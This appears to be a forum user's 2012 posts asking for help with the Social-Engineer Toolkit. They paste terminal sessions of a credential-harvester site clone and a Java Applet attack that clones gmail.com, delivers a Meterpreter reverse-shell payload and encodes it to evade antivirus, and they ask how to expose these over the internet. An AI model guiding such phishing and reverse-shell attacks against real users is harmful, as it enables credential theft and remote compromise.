Shinigami

Posts posted by Shinigami

  1.    1) Web Templates
       2) Site Cloner
       3) Custom Import
    
      99) Return to Webattack Menu
    
    set:webattack>2
    [-] Credential harvester will allow you to utilize the clone capabilities within SET
    [-] to harvest credentials or parameters from a website as well as place them into a report
    [-] This option is used for what IP the server will POST to.
    [-] If you're using an external IP, use your external IP for this
    
    set:webattack> IP address for the POST back in Harvester/Tabnabbing:***********
    
    [-] SET supports both HTTP and HTTPS
    [-] Example: http://www.thisisafakesite.com
    
    set:webattack> Enter the url to clone:https://*****.com
    
    [*] Cloning the website: https://*****.com
    [*] This could take a little bit...
    
    The best way to use this attack is if username and password form
    fields are available. Regardless, this captures all POSTs on a website.
    [*] I have read the above message. [*]
    
    Press {return} to continue.
    [*] Social-Engineer Toolkit Credential Harvester Attack
    [*] Credential Harvester is running on port *****
    [*] Information will be displayed to you as it arrives below:
    
    localhost - - [29/Jun/2012 13:39:44] "GET / HTTP/1.1" 200 -
    
    

    Problem is, the CLONED_SITE is BLANK. Locating the INDEX.HTML file in the WEB_CLONE folder, it's BLANK.

    I'm not sure why this is happening. It worked perfectly until yesterday. I deleted the PROGRAM_JUNK data, also reloaded an old Snapshot of SET, and I still have this issue. It DOES connect to the internet to clone the specified Site, but the cloned_site is just EMPTY/BLANK.

    I did try plenty of other sites to clone. They all take a while in cloning from the Internet, and smoothly proceed with listening to incoming connections, but the Index is empty. Could it be a bug in the Update?

  2. If your external IP address is dynamic, then I'd use a No-IP "hostname"; if it's static, I'd just use the IP.

    Correct, when the target machine connects back to your attacker's machine, it will be looking for a port to connect to. The default port is 443 but it can be changed to any port you want.

    It won't be possible to run both applications on the same ports; what you could do is have both apps running at the same time but on different ports.

    Thank you! Very grateful for your response, very elaborate. Can you please explain the SECOND query I posted? Concerning the code where it asks if my Metasploit is running on the same IP or a different one. Should I use my Local IP here or Public again?

    Thanks again.

  3. Hi, before I pose my query, I would like to introduce myself. I've been a CEH and ECSA for quite some time now. However, I'm still learning, and today I was just curious to understand the routing of how SET is connected to the MSF.

    Question: To make things simple I'm copying the lines from the Terminal and I'll point out what I'm referring to. Setting up JavaApplet in S.E.T:

    
       1) Java Applet Attack Method
    
    set:webattack>1
    
       2) Site Cloner
    
    set:webattack>2
    
    [-] NAT/Port Forwarding can be used in the cases where your SET machine is
    [-] not externally exposed and may be a different IP address than your reverse listener.
    
    set> Are you using NAT/Port Forwarding [yes|no]: y  
    
    #####set:webattack> IP address to SET web server (this could be your external IP or hostname):***.***.***.***######
    
    #####set:webattack> Is your payload handler (metasploit) on a different IP from your external NAT/Port FWD address [yes|no]:n#######
    
    [-] SET supports both HTTP and HTTPS
    [-] Example: http://www.thisisafakesite.com
    
    set:webattack> Enter the url to clone:https://gmail.com
    
    [*] Cloning the website: https://gmail.com
     [*] Malicious java applet website prepped for deployment
    
    What payload do you want to generate:
    
      Name:                                       Description:
       1) Windows Shell Reverse_TCP               Spawn a command shell on victim and send back to attacker
       2) Windows Reverse_TCP Meterpreter         Spawn a meterpreter shell on victim and send back to attacker
    set:payloads>2
    
    Below is a list of encodings to try and bypass AV. 
    Select one of the below, 'backdoored executable' is typically the best.
    
       1) avoid_utf8_tolower (Normal)
      16) Backdoored Executable (BEST)
    
    set:encoding>16
    #####set:payloads> PORT of the listener [443]:#####
    
    [*] Generating x64-based powershell injection code...
    
    

    FIRST: The first HASHED line of code, "(this could be your external IP or hostname)". Can I use no-ip or other DNS instead of an IP Address here? For I have a Dynamic IP issue here. Since SET uses the IP to bind it to a HANDLER, where there is only REVERSE_TCP and no TCP_DNS.

    SECOND: The Second line of code following, I seriously don't understand this. If I put in a Local Static IP address in this field (after choosing 'yes'), would that make a difference? What would be the 'Correct' option if I were to practice this over the Internet? Would I use the PUBLIC-IP/DNS just like I used it for the option Before this one? And why would it ask for my HANDLER's IP when it generates its own Handler? Please elaborate on this option, thank you.

    THIRD: The last HASHED line that asks for a PORT, if I'm not wrong, this is the HANDLER's port?

    LASTLY: I configured the SET_CONFIG to use a specific WEB_PORT, say '5555', but when this JavaAppletServer initializes, it speaks on 8080 and 8081. So how do I run CredentialHarvester alongside when they both are on different ports?

    Thank you
